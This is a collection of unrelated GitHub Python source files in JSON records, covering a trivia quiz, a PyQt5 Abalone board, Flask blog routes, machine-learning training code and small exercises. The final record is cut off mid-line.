+{"seq_id":"4595268795","text":"from monad.IterableMonad import TupleMonad\n\n\nf = lambda a: TupleMonad((a-1, a, a+1))\ng = lambda a: TupleMonad((a, -a))\n# left identity\na = 2\nlhs = TupleMonad((a,)).flat_map(f)\nrhs = f(a)\nprint(lhs == rhs)\n\n# right identity\nlhs=TupleMonad((a,)).flat_map(lambda x: TupleMonad((x,)))\nrhs=TupleMonad((a,))\nprint(lhs == rhs)\n\n# associativity\nm = TupleMonad((1, 2))\nlhs = m.flat_map(f).flat_map(g)\nrhs = m.flat_map(lambda x: f(x).flat_map(g))\nprint(lhs == rhs)\n\n","repo_name":"michaelw123/IterableMonad","sub_path":"tests/tuple_monad_test.py","file_name":"tuple_monad_test.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1494247395","text":"from multiprocessing import Queue\nfrom typing import Callable\n\nimport numpy as np\nfrom PyQt5.QtCore import QSize, Qt, QTimer\nfrom PyQt5.QtGui import QColor, QPaintEvent, QPainter, QPen, QBrush, QMouseEvent\nfrom PyQt5.QtWidgets import QDesktopWidget, QWidget, QMainWindow, QHBoxLayout, QVBoxLayout\n\nfrom abalone import AbaloneModel\nfrom abalone.StoneColor import StoneColor\nfrom graphics.QSyncManager import SyncType, iteration_queue, SyncClick\n\nOUTLINE_COLOR = {\n \"NORMAL\": QColor(\"#212121\"),\n \"SUCCESS_SELECT\": QColor(\"#00C853\"),\n \"FAIL_SELECT\": QColor(\"#D50000\")\n}\n\nCELL_COLOR = {StoneColor.BLACK: QColor(\"#263238\"),\n StoneColor.WHITE: QColor(\"#CFD8DC\")}\n\n\nclass _Qt5AbaloneCell(QWidget):\n\n def __init__(self, block_size: int,\n click_handler: Callable[[], bool]):\n # noinspection PyArgumentList\n super(_Qt5AbaloneCell, self).__init__()\n\n self.block_size = block_size\n self.click_handler = click_handler\n\n self.out_line_size = 
block_size // 15\n self.cell_color = StoneColor.NONE\n self.selected = False\n\n self._init_cell()\n\n def _init_cell(self):\n self.setFixedSize(QSize(self.block_size, self.block_size))\n self.update()\n\n # event handle\n\n def paintEvent(self, q_paint_event: QPaintEvent):\n painter = QPainter(self)\n painter.setRenderHint(QPainter.Antialiasing)\n\n if self.cell_color != StoneColor.NONE:\n painter.setBrush(QBrush(CELL_COLOR[self.cell_color], Qt.SolidPattern))\n\n painter.setPen(QPen(OUTLINE_COLOR[\"SUCCESS_SELECT\"] if self.selected else OUTLINE_COLOR[\"NORMAL\"],\n self.out_line_size, Qt.SolidLine))\n painter.drawEllipse(self.out_line_size, self.out_line_size,\n self.block_size - self.out_line_size * 2, self.block_size - self.out_line_size * 2)\n\n def mouseReleaseEvent(self, q_mouse_event: QMouseEvent):\n if q_mouse_event.button() == Qt.LeftButton:\n self.click_handler()\n\n # cell control\n\n def reset_cell(self) -> None:\n self.cell_color = StoneColor.NONE\n self.selected = False\n self.update()\n\n def set_color(self, color: StoneColor = StoneColor.NONE) -> None:\n if self.cell_color != color:\n self.cell_color = color\n self.update()\n\n def set_select(self, selected: bool = True) -> None:\n if not (self.cell_color == StoneColor.NONE and not self.selected or self.selected == selected):\n self.selected = selected\n self.update()\n\n\nclass Qt5UserInterfaceAgent(QMainWindow):\n\n # noinspection PyArgumentList\n def __init__(self,\n sync_queue: Queue,\n fps: int = 60,\n disable_click_interface: bool = True,\n ui_pipe: Queue = None,\n block_size: int = 50):\n super(Qt5UserInterfaceAgent, self).__init__()\n self.sync_queue = sync_queue\n self.fps = fps\n self.disable_click_interface = disable_click_interface\n self.ui_pipe = ui_pipe\n self.block_size = block_size\n\n init_data = sync_queue.get()\n\n self.edge_size = init_data.game_vector[0]\n\n self._abalone_cell = list()\n self._timer = None\n self._prv_board_hash = None\n self._get_1d_pos, _ = AbaloneModel.build_pos_method(self.edge_size)\n\n self._wait_ui_response = False\n\n self._init_ui()\n self.update_board(init_data.game_vector)\n self._init_timer()\n\n # init ui\n\n # noinspection PyArgumentList\n def _init_ui(self) -> None:\n self.setWindowTitle(\"AbaloneRL Qt5 \"\n + (\"Visualizer\" if self.disable_click_interface else \"Graphic User Interface\"))\n self.statusBar().showMessage(\"AbaloneRL, Ready\")\n\n self.setAutoFillBackground(True)\n palette = self.palette()\n palette.setColor(self.backgroundRole(), Qt.white)\n self.setPalette(palette)\n\n center_weight = QWidget()\n horizon_layout = QHBoxLayout()\n\n board_layout = QVBoxLayout()\n board_layout.setSpacing(0)\n board_layout.setContentsMargins(*[self.block_size // 4] * 4)\n\n self._init_abalone_board(board_layout)\n\n horizon_layout.addLayout(board_layout)\n\n center_weight.setLayout(horizon_layout)\n self.setCentralWidget(center_weight)\n\n qr = self.frameGeometry()\n qr.moveCenter(QDesktopWidget().availableGeometry().center())\n self.move(qr.topLeft())\n\n self.show()\n\n # noinspection PyArgumentList\n def _init_abalone_board(self, board_layout: QVBoxLayout) -> None:\n # noinspection PyShadowingNames\n def next_layout(y: int) -> QHBoxLayout:\n new_layout = QHBoxLayout()\n new_layout.setAlignment(Qt.AlignLeft)\n new_layout.addSpacing((self.edge_size - y - 1 if y < self.edge_size else y - self.edge_size + 1)\n * (self.block_size + self.block_size // 5) / 2)\n new_layout.setSpacing(self.block_size // 5)\n return new_layout\n\n def build_on_click_cell(fy: int, fx: int) -> 
Callable[[], bool]:\n            def on_click_cell() -> bool:\n                self.ui_pipe.put(SyncClick(fy, fx))\n                return True\n\n            return on_click_cell\n\n        prv_layout, prv_y = next_layout(0), 0\n        for idx, y, x in AbaloneModel.pos_iterator(self.edge_size):\n            if prv_y != y:\n                board_layout.addLayout(prv_layout)\n                prv_layout, prv_y = next_layout(y), y\n\n            cell = _Qt5AbaloneCell(self.block_size, build_on_click_cell(y, x))\n            prv_layout.addWidget(cell)\n            self._abalone_cell.append(cell)\n        board_layout.addLayout(prv_layout)\n\n    # noinspection PyUnresolvedReferences\n    def _init_timer(self) -> None:\n        self._timer = QTimer()\n        self._timer.timeout.connect(self._timer_tick)\n        self._timer.start(1000 // self.fps)  # QTimer.start() expects the interval in milliseconds\n\n    # qt5 ui\n\n    def update_board(self, game_vector: np.ndarray) -> None:\n        self.update_status_bar(game_vector)\n\n        def update(cell, index):\n            cell.set_color(StoneColor(game_vector[index + 5]))\n            cell.set_select(False)\n\n        self._seq_iteration_board(lambda cell, index: update(cell, index))\n\n    def update_status_bar(self, game_vector: np.ndarray):\n        self.statusBar().showMessage(\"Turns: {0}; Drop Black: {1}; Drop White: {2}; Current Color: {3}\"\n                                     .format(game_vector[1], game_vector[3], game_vector[4],\n                                             \"BLACK\" if game_vector[2] == StoneColor.BLACK else\n                                             (\"WHITE\" if game_vector[2] == StoneColor.WHITE else \"NONE\")))\n\n    # board control ui\n\n    def reset_board(self) -> None:\n        self._iteration_board(lambda cell: cell.reset_cell())\n\n    # bin ui control\n\n    def _iteration_board(self, f: Callable[[_Qt5AbaloneCell], None]) -> None:\n        for cell in self._abalone_cell:\n            f(cell)\n\n    def _seq_iteration_board(self, f: Callable[[_Qt5AbaloneCell, int], None]) -> None:\n        for index in range(len(self._abalone_cell)):\n            f(self._abalone_cell[index], index)\n\n    def _detect_diff_board(self, game_vector: np.ndarray) -> bool:\n        board_hash = hash(game_vector.__str__())\n        if self._prv_board_hash == board_hash:\n            return False\n        else:\n            self._prv_board_hash = board_hash\n            return True\n\n    # user click-interface\n\n    def _timer_tick(self) -> None:\n        for queue in iteration_queue(self.sync_queue):\n            if queue.sync_type == SyncType.SYNC_DRAW and self._detect_diff_board(queue.game_vector):\n                self.update_board(queue.game_vector)\n            elif queue.sync_type == SyncType.SYNC_KILL:\n                exit()\n            elif queue.sync_type == SyncType.SYNC_SELECT:\n                self._abalone_cell[self._get_1d_pos(queue.y, queue.x)].set_select(queue.selected)\n\n    def _send_ui_request(self) -> None:\n        pass\n","repo_name":"junghyun397/AbaloneRL","sub_path":"graphics/qt5/Qt5UserInterfaceAgent.py","file_name":"Qt5UserInterfaceAgent.py","file_ext":"py","file_size_in_byte":8088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32401236496","text":"from models.weibo import Weibo\n\nfrom routes import *\n\n\nmain = Blueprint('weibo', __name__)\n\nModel = Weibo\n\n\n@main.route('/')\ndef all():\n    user = curr_user()\n    models = Model.all()\n    print(\"Currently logged-in user:\", user)\n    return render_template('weibo/weibos.html', curr_user=user, models=models)\n\n\n@main.route('/index/<int:id>')\ndef index(id):\n    model = Model.query.get(id)\n    comments = model.comments\n    user = model.user\n    return render_template('weibo/index.html', weibo=model, comments=comments, user=user)\n\n\n@main.route('/edit/<int:id>')\ndef edit(id):\n    m = Model.query.get(id)\n    return render_template('weibo/edit.html', model=m)\n\n\n@main.route('/add', methods=['POST'])\n@login_required\ndef add():\n    form = request.form\n    user = curr_user()\n    model = Model.new(form)\n    model.user_id = user.id\n    model.save()\n    
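# NOTE: responding to this POST with a redirect (Post/Redirect/Get) instead of\n    # rendering a template means a browser refresh cannot resubmit the form.\n    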
return redirect(url_for('weibo.all'))\n\n\n@main.route('/update/<int:id>', methods=['POST'])\n@login_required\ndef update(id):\n    form = request.form\n    Model.update(id, form)\n    model = Model.query.get(id)\n    model.updated_time = int(time.time())\n    model.save()\n    return redirect(url_for('user.index'))\n\n\n@main.route('/delete/<int:id>')\n@login_required\ndef delete(id):\n    Model.delete(id)\n    return redirect(url_for('user.index'))\n","repo_name":"IrisCSX/Weibo","sub_path":"routes/weibo.py","file_name":"weibo.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70353116906","text":"import tokenizers\n\n\n# Paths\nTOKENIZER_PATH = '../xlnet_tokenizer'\nTRAINING_FILE = '../data/train_folds.csv'\nTEST_FILE = '../data/test.csv'\nSUB_FILE = '../data/sample_submission.csv'\nMODEL_SAVE_PATH = './model_save'\nTRAINED_MODEL_PATH = './model_save'\n\n# Model config\nMODEL_CONFIG = 'xlnet-base-cased'\n\n# Model params\nSEED = 25\nN_FOLDS = 5\nEPOCHS = 4\nLEARNING_RATE = 4e-5\nPATIENCE = None\nEARLY_STOPPING_DELTA = None\nTRAIN_BATCH_SIZE = 32\nVALID_BATCH_SIZE = 32\nMAX_LEN = 128  # actually = 86\nHIDDEN_SIZE = 768\nN_LAST_HIDDEN = 12\nHIGH_DROPOUT = 0.5\nSOFT_ALPHA = 0.6\nWARMUP_RATIO = 0.25\nWEIGHT_DECAY = 0.001\nUSE_SWA = False\nSWA_RATIO = 0.9\nSWA_FREQ = 30\n","repo_name":"heartkilla/kaggle_tweet","sub_path":"src/1st_level/xlnet/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"37"} +{"seq_id":"31087771301","text":"num = []\r\nwhile True:\r\n    num.append(int(input('Enter a value: ')))\r\n    resp = str(input('Do you want to continue? [y/n]')).strip().lower()\r\n    if resp in 'Nn':\r\n        break\r\nprint(f'{len(num)} numbers were entered into the list.')\r\nif 5 in num:\r\n    print(f'The number 5 was entered at position {num.index(5)}.')\r\nelse:\r\n    print('The number 5 was not entered.')\r\nprint('The list in descending order is: ', end='')\r\nnum.sort(reverse=True)\r\nprint(num)\r\n","repo_name":"luisasm08/Codigos_python","sub_path":"listas.2.py","file_name":"listas.2.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15636244587","text":"import html\nimport random\nimport requests\n\nURL = \"https://opentdb.com/api.php?amount=10&category=11&difficulty=easy\"\nBASE_URL = \"https://opentdb.com/api.php?\"\n\nCATEGORIES = {\n    9: \"General Knowledge\",\n    10: \"Entertainment- Books\",\n    11: \"Entertainment- Film\",\n    12: \"Entertainment- Music\",\n    13: \"Entertainment- Musicals & Theater\",\n    14: \"Entertainment- Television\",\n    15: \"Entertainment- Video Games\",\n    16: \"Entertainment- Board Games\",\n    17: \"Science- Nature\",\n    18: \"Science- Computers\",\n    19: \"Science- Mathematics\",\n    20: \"Mythology\",\n    21: \"Sports\",\n    22: \"Geography\",\n    23: \"History\",\n    24: \"Politics\",\n    25: \"Art\",\n    26: \"Celebrities\",\n    27: \"Animals\",\n    28: \"Vehicles\",\n    29: \"Entertainment- Comics\",\n    30: \"Science- Gadgets\",\n    31: \"Entertainment- Japanese Anime & Manga\",\n    32: \"Entertainment- Cartoon Animations\",\n}\nQUESTION_TYPES = [\"any\", \"multiple\", \"boolean\"]\nDIFFICULTIES = [\"easy\", \"medium\", \"hard\"]\n\n\ndef main():\n    print(\"\")\n\n    # Select Category\n    for category_id, category in CATEGORIES.items():\n        print(f\"{category_id}. 
{category}\")\n\n selected_category = input(\"\\nPlease select a category:\\n> \")\n\n # Select Types of Question\n print(\"\")\n for category_id, question in enumerate(QUESTION_TYPES):\n print(f\"{category_id+1}. {question}\")\n\n selected_type = input(\"\\nPlease select a question type:\\n> \")\n api_type = QUESTION_TYPES[int(selected_type) - 1]\n\n # Select Question Difficulty Level\n print(\"\")\n for category_id, difficulty in enumerate(DIFFICULTIES):\n print(f\"{category_id+1}. {difficulty}\")\n\n selected_difficulty = input(\"\\nPlease select a difficulty:\\n> \")\n api_difficulty = DIFFICULTIES[int(selected_difficulty) - 1]\n\n # Select the number of questioins\n print(\"\")\n selected_quantity = input(\"\\nHow many questions do you want:\\n> \")\n api_quantity = int(selected_quantity)\n\n # Add or remove api_type if \"any\" option was selected\n final_api_type = \"\"\n if api_type == \"any\":\n final_api_type = \"\"\n else:\n final_api_type = f\"&type={api_type}\"\n\n # Generate base URL\n url = (\n BASE_URL\n + f\"amount={api_quantity}&category={selected_category}&difficulty={api_difficulty}{final_api_type}\"\n )\n\n res = requests.get(url, timeout=5)\n data = res.json()\n\n questions = data[\"results\"]\n total_questions: int = len(questions)\n\n # If no questions received, exit the program\n if not total_questions:\n print(\n \"\\n Sorry! Nothing found for selected combination. Please try again with different combinatinon or lower number of questions.\"\n )\n return\n\n # keep track of correctly answerd questions\n answered_correctly: int = 0\n question_num: int = 1\n\n for question in questions:\n correct_answer = html.unescape(question[\"correct_answer\"].strip())\n\n options: list[str] = [\n html.unescape(ans).strip() for ans in question[\"incorrect_answers\"]\n ]\n\n options.append(correct_answer)\n random.shuffle(options) # shuffle the answers\n\n # List question\n print(f\"\\nQuestion {question_num}: {html.unescape(question['question'])}\")\n for i, option in enumerate(options):\n print(f\" {i+1}. {option}\")\n\n valid_selection = False\n selected_num: int = -1\n print(\"\\nPlease select an option:\")\n\n # Get user input (validated)\n while not valid_selection:\n selected_option = input(\"> \")\n\n if not selected_option.isnumeric() or not 0 < int(selected_option) <= len(\n options\n ):\n print(\"Invalid selection. Please try again.\")\n continue\n\n selected_num = int(selected_option) - 1\n valid_selection = True\n\n # Check if answer is correct\n if options[selected_num] == correct_answer:\n print(\"You are correct!\")\n answered_correctly += 1\n else:\n print(f\"Incorrect! 
The correct answer was {correct_answer}.\")\n\n question_num += 1\n\n # Display final result\n print(f\"\\n*** You answered {answered_correctly} of {total_questions} correctly ***\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bellicose100xp/CAP_Python_Linux","sub_path":"trivia/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39800054688","text":"import pytorch_lightning as pl\nimport torch.nn\n\nfrom modules.bio.model import *\nfrom modules.ddd.model import *\n\n\nclass ProteinMutationTrainer(pl.LightningModule):\n\n def __init__(self, train_dataset=None, val_dataset=None, encoder_dims=(32, 64, 128), encoder_grids=(32, 16, 8),\n encoder_dim=128, learning_rate=1e-4, min_lr_rate=0.5, epochs=30, steps=1000, batch_size=32,\n unique_atoms=36, atoms_embedding_dim=128, generated_features=48, seq_len=401, regression_blocks=8,\n regression_dim=256, seq_agg=4, regression_out_dims=(512, 256, 128), acids=20, acid_embedding_dim=128,\n pe_powers=16):\n super(ProteinMutationTrainer, self).__init__()\n\n self.save_hyperparameters(ignore=['train_dataset', 'val_dataset'])\n\n self.train_dataset = train_dataset\n self.val_dataset = val_dataset\n self.learning_rate = learning_rate\n self.min_lr_rate = min_lr_rate\n self.epochs = epochs\n self.steps = steps\n self.batch_size = batch_size\n self.pe_powers = pe_powers\n\n self.atom_embeds = torch.nn.Embedding(num_embeddings=unique_atoms + 1, embedding_dim=atoms_embedding_dim,\n padding_idx=unique_atoms)\n self.acid_embeds = torch.nn.Embedding(num_embeddings=acids + 1, embedding_dim=acid_embedding_dim,\n padding_idx=acids)\n self.point_encoder = MultiPointVoxelCNN(input_dim=generated_features + atoms_embedding_dim,\n dim=encoder_dim,\n dims=encoder_dims, grids=encoder_grids, do_points_map=True)\n self.point_regression = PointRegression(input_dim=3 * (encoder_dim + pe_powers * 3 + acid_embedding_dim),\n hidden_dim=regression_dim,\n seq_len=seq_len, n_blocks=regression_blocks, agg_dim=seq_agg,\n out_dims=regression_out_dims)\n\n def forward(self, batch):\n # get embeddings for atoms in space\n wt_atoms, mut_atoms = self.atom_embeds(batch['wt_atom_ids'].long()), \\\n self.atom_embeds(batch['mut_atom_ids'].long())\n # construct features with atom embeddings and nerf like positional encodings\n # WILD-TYPE\n wt_features = torch.cat([batch['wt_features'], wt_atoms], dim=-1)\n wt_grids = self.point_encoder.voxelize(batch['wt_points'], wt_features, mask=batch['wt_mask'])\n wt_features = self.point_encoder.devoxelize(batch['wt_alpha_points'], wt_grids, mask=batch['wt_alpha_mask'])\n wt_pos_features = get_positional_encoding(batch['wt_alpha_points'], self.pe_powers * 3)\n wt_pos_features = torch.where(batch['wt_alpha_mask'].unsqueeze(-1), wt_pos_features,\n torch.zeros_like(wt_pos_features))\n wt_features = torch.cat([wt_features, wt_pos_features, self.acid_embeds(batch['wt_acids'])], dim=-1)\n # MUTANT encoding\n mut_features = torch.cat([batch['mut_features'], mut_atoms], dim=-1)\n mut_grids = self.point_encoder.voxelize(batch['mut_points'], mut_features, mask=batch['mut_mask'])\n mut_features = self.point_encoder.devoxelize(batch['mut_alpha_points'], mut_grids, mask=batch['mut_alpha_mask'])\n mut_pos_features = get_positional_encoding(batch['mut_alpha_points'], self.pe_powers * 3)\n mut_pos_features = torch.where(batch['mut_alpha_mask'].unsqueeze(-1), mut_pos_features,\n torch.zeros_like(mut_pos_features))\n mut_features = 
torch.cat([mut_features, mut_pos_features, self.acid_embeds(batch['mut_acids'])], dim=-1)\n # Features concat\n features = torch.cat([wt_features, mut_features, wt_features - mut_features], dim=-1)\n # do regression on volume features with masking\n feature_mask = torch.logical_or(batch['wt_alpha_mask'], batch['mut_alpha_mask'])\n preds = self.point_regression(features, mask=feature_mask)\n return {\n 'pred': preds\n }\n\n def shared_step(self, batch, kind='train'):\n out = self.forward(batch)\n loss = torch.nn.functional.mse_loss(batch['dT'], out['pred'])\n self.log(f'{kind}_loss', loss, prog_bar=True, sync_dist=True)\n return loss\n\n def training_step(self, batch, batch_idx):\n return self.shared_step(batch)\n\n def validation_step(self, batch, batch_idx):\n return self.shared_step(batch)\n\n def configure_optimizers(self):\n opt = torch.optim.Adam(params=self.parameters(), lr=self.learning_rate, betas=(0.9, 0.99))\n scheduler = torch.optim.lr_scheduler.OneCycleLR(opt, max_lr=self.learning_rate,\n pct_start=3 / self.epochs, div_factor=2.0,\n final_div_factor=1 / (2.0 * self.min_lr_rate),\n epochs=self.epochs, steps_per_epoch=self.steps)\n scheduler = {\n 'scheduler': scheduler,\n 'interval': 'step'\n }\n return [opt], [scheduler]\n\n def train_dataloader(self):\n return torch.utils.data.DataLoader(self.train_dataset, batch_size=self.batch_size, shuffle=False,\n num_workers=torch.cuda.device_count() * 2,\n pin_memory=True, drop_last=False, prefetch_factor=2)\n\n def val_dataloader(self):\n return torch.utils.data.DataLoader(self.val_dataset, batch_size=self.batch_size, shuffle=False,\n num_workers=torch.cuda.device_count() * 2,\n pin_memory=True, drop_last=False, prefetch_factor=2)\n","repo_name":"sthfaceless/explore","sub_path":"modules/bio/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17813560109","text":"import torch\nimport numpy as np\nimport random\nimport pandas as pd\n\n# my files\nfrom property_handler import property_calc, similarity_calc, smiles2fingerprint, is_valid_molecule\n\n\n# set seed\ndef set_seed(seed):\n torch.manual_seed(seed)\n random.seed(seed)\n random.SystemRandom(seed)\n np.random.seed(seed)\n np.random.RandomState(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.enabled = False\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n\n# generate output molecule from input molecule\ndef input2output(args, input_batch, model_in, T, model_out, random_seed_list=None, max_out_len=90, recover_seed=True):\n # prepare input\n input_batch = tuple(data.to(model_in.device) for data in input_batch)\n\n if args.use_fp and args.use_EETN:\n # prepare finger prints\n input_batch_fp_str = [smiles2fingerprint(model_in.tensor2string(input), fp_translator=True) for input in input_batch]\n input_batch_fp = torch.tensor([[float(dig) for dig in fp_mol] for fp_mol in input_batch_fp_str]).to(\n model_in.device)\n input_batch_fp = input_batch_fp.detach()\n else:\n input_batch_fp = None\n\n random_seed_list = args.seed if random_seed_list is None else random_seed_list\n output_batch = []\n for seed in random_seed_list:\n # set seed\n set_seed(seed)\n if args.conditional:\n translated_batch_emb = input_batch_fp\n else:\n # embedder encode (METN)\n input_batch_emb, _ = model_in.forward_encoder(input_batch)\n\n if args.use_EETN:\n # embedding translator (EETN)\n 
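# NOTE: presumably METN encodes the molecule into input_batch_emb (above) and\n                # EETN (T) maps that embedding toward the target domain, optionally\n                # conditioned on the fingerprint features input_batch_fp.\n                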
translated_batch_emb = T(input_batch_emb, input_batch_fp)\n            else:\n                translated_batch_emb = input_batch_emb\n\n        # embedder decode (decode test = input is <sos> and multi for next char + embedding) (METN)\n        output_batch += model_out.decoder_test(max_len=max_out_len, embedding=translated_batch_emb)\n\n    if recover_seed is True:\n        set_seed(args.seed)\n    return output_batch\n\n\n\n# generate intermediate embeddings and output from input\ndef input2all(args, input_batch, model_in, T, model_out, max_out_len=90):\n    # prepare input\n    input_batch = tuple(data.to(model_in.device) for data in input_batch)\n\n    if args.use_fp and args.use_EETN:\n        # prepare fingerprints\n        input_batch_fp_str = [smiles2fingerprint(model_in.tensor2string(input), fp_translator=True) for input in input_batch]\n        input_batch_fp = torch.tensor([[float(dig) for dig in fp_mol] for fp_mol in input_batch_fp_str]).to(\n            model_in.device)\n        input_batch_fp = input_batch_fp.detach()\n    else:\n        input_batch_fp = None\n\n    # embedder encode (METN)\n    input_batch_emb, _ = model_in.forward_encoder(input_batch)\n\n    if args.use_EETN:\n        # embedding translator (EETN)\n        translated_batch_emb = T(input_batch_emb, input_batch_fp)\n    else:\n        translated_batch_emb = input_batch_emb\n\n    # embedder decode (decode test = input is <sos> and multi for next char + embedding) (METN)\n    output_batch = model_out.decoder_test(max_len=max_out_len, embedding=translated_batch_emb)\n\n    return input_batch_emb, translated_batch_emb, output_batch\n\n\n# check if output molecule is novel (different from the input molecule and not in trainset)\ndef is_novel(input_mol_smiles, output_mol_smiles, trainset):\n    return (input_mol_smiles != output_mol_smiles) and (output_mol_smiles not in trainset)\n\n\n# generate a list of 'length' random integers, each one from [0, 100000]\ndef get_random_list(length, last=100000):\n    return [random.randint(0, last) for i in range(length)]\n\n\ndef generate_results_file(test_loader, input2output_func, input2smiles, results_file_path):\n    in_mols, out_mols = [], []\n    for i, input_batch in enumerate(test_loader):\n        current_batch_size = len(input_batch)\n\n        # generate output batch\n        output_batch = input2output_func(input_batch)\n\n        # for every input molecule\n        for j, input in enumerate(input_batch):\n            input_molecule_smiles = input2smiles(input)  # to smiles\n            output_molecule_smiles_list = output_batch[j::current_batch_size]\n\n            out_mols.extend(output_molecule_smiles_list)\n            in_mols.extend([input_molecule_smiles] * len(output_molecule_smiles_list))\n\n    results = pd.DataFrame(list(zip(in_mols, out_mols)))\n    results.to_csv(results_file_path, index=False, header=False, sep=' ')\n\n\ndef process_results_file(res_file_path, args, valid_res_file_path, trainset):\n    res_df = pd.read_csv(res_file_path, header=None, delimiter=' ')\n    res_df.rename(columns={0: 'input', 1: 'output'}, inplace=True)\n\n    # filter valid molecules\n    valid_res_def = res_df[np.vectorize(is_valid_molecule)(res_df['output'], args.property)]\n\n    if valid_res_def.empty:\n        valid_res_def = pd.DataFrame(columns=['input', 'output', args.property, 'sim', 'novel'])\n        valid_res_def = valid_res_def.append({'input':'invalid', 'output':'invalid', args.property:0, 'sim':0, 'novel':0}, ignore_index=True)\n    else:\n        # add property column for output molecules\n        valid_res_def[args.property] = np.vectorize(property_calc)(valid_res_def['output'], args.property)\n\n        # add similarity between input and output molecules column\n        valid_res_def['sim'] = np.vectorize(similarity_calc)(valid_res_def['input'], 
valid_res_def['output'])\n\n        # add novelty column for output molecules\n        valid_res_def['novel'] = np.vectorize(is_novel)(valid_res_def['input'], valid_res_def['output'], trainset)\n\n    # save output df\n    valid_res_def.to_csv(valid_res_file_path, index=False)\n\n\n# calculate metrics\ndef valid_results_file_to_metrics(valid_res_file_path, args, num_source_mols):\n    valid_df = pd.read_csv(valid_res_file_path)\n\n    validity, diversity, novelty, property, similarity, SR = [], [], [], [], [], []\n    for retry_i in range(10):\n        validity_mean, diversity_mean, novelty_mean, property_mean, similarity_mean, SR_mean = \\\n            get_metrics_for_sample(valid_df, args, how_many_samples=1, num_source_mols=num_source_mols, seed=retry_i)\n\n        validity.append(validity_mean)\n        diversity.append(diversity_mean)\n        novelty.append(novelty_mean)\n        property.append(property_mean)\n        similarity.append(similarity_mean)\n        SR.append(SR_mean)\n\n    validity_np, diversity_np, novelty_np, property_np, similarity_np, SR_np = np.array(validity), \\\n        np.array(diversity), np.array(novelty), np.array(property), np.array(similarity), np.array(SR)\n    return validity_np.mean(), validity_np.std(), \\\n           diversity_np.mean(), diversity_np.std(), \\\n           novelty_np.mean(), novelty_np.std(), \\\n           property_np.mean(), property_np.std(), \\\n           similarity_np.mean(), similarity_np.std(), \\\n           SR_np.mean(), SR_np.std()\n\ndef get_metrics_for_sample(valid_df, args, how_many_samples, num_source_mols, seed):\n    # shuffle\n    valid_df = valid_df.sample(len(valid_df), replace=False, random_state=seed)\n\n    # get sample for each source molecule\n    valid_df = valid_df.groupby(['input'], as_index=False).head(how_many_samples)\n    num_valid_mols = len(valid_df)\n\n    # get unique output molecules\n    unique_out_mols = valid_df['output'].unique()\n\n    # calculate *** VALIDITY ***\n    validity = num_valid_mols / num_source_mols\n\n    # calculate *** DIVERSITY ***\n    diversity = len(unique_out_mols) / num_valid_mols\n\n    # calculate *** SR ***\n    SR = len(valid_df[(valid_df['sim'] > args.SR_similarity) & (valid_df[args.property] > args.SR_property_val) & (valid_df['novel'])]) / num_valid_mols\n\n    return validity, diversity, valid_df['novel'].mean(), valid_df[args.property].mean(), valid_df['sim'].mean(), SR","repo_name":"guy-ba/UGMMT","sub_path":"common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":7845,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29514298907","text":"class Solution(object):\n    def removeElement(self, nums, val):\n        \"\"\"\n        :type nums: List[int]\n        :type val: int\n        :rtype: int\n        \"\"\"\n        count = 0\n        return_array = []\n        i = 0\n        for i in range (len(nums)):\n            if (nums[i] != val):\n                count = count + 1\n                return_array.append(nums[i])\n        nums[:] = return_array\n        return count\n","repo_name":"khcheng2018/Leetcode_training","sub_path":"remove_element/remove_element.py","file_name":"remove_element.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22675649096","text":"def d(n, sequence, memo):\n    if n == 1:\n        return memo[0]\n\n    for i in range(1, n):\n        memo[i] = max(memo[i - 1] + int(sequence[i]), int(sequence[i]))\n\n    max_result = memo[0]\n    for i in range(n):\n        max_result = max(max_result, memo[i])\n\n    return max_result\n\n\nn = int(input())\nsequence = input().split(' ')\nmemo = [None] * 100000\nmemo[0] = int(sequence[0])\n\nprint(d(n, sequence, 
memo))\n","repo_name":"ino-jeong/study-practice","sub_path":"baekjoon online judge/01912 series_sum/series_sum(2).py","file_name":"series_sum(2).py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22367474722","text":"#**kwargs parameter tha packs all arguments into a dictionary\n#so that a fucntion can accepsta varying amount of keyword arguments\n\ndef hello(**kwargs):\n print(\"Hello \" + kwargs['first'] + \" \" + kwargs['last'])\n print(\"Hello\", end=\" \")\n for key, value in kwargs.items():\n print(value, end=\" \")\n\nhello(title = \"Miss.\", first=\"Gloria\", middle=\"Moraa\", last=\"Riechi\")\nprint(\"\\n\")\n\nprice = 1000000\n\ngoodCredit = False\n\nif goodCredit:\n down_payment = int(0.1 * price)\nelse:\n down_payment = int(0.2 * price)\n\nprint(\"The down payment for this buyer is\", str(down_payment) + \" dollars\")\n\nhighIncome = True\ngood_credit = False\n\nif good_credit and not highIncome:\n print(\"Customer is eligible for a loan\")\nelse:\n print(\"Customer is not eligible for a loan\")\n\nname1 = input(\"Please enter your name \")\n\nif len(name1) < 3:\n print(\"Name must be more than three characters\")\nelif len(name1) > 50:\n print(\"Name must be less than fifty characters\")\nelse:\n print(\"Name looks good!\")\n\nweight = input(\"Please enter your weight 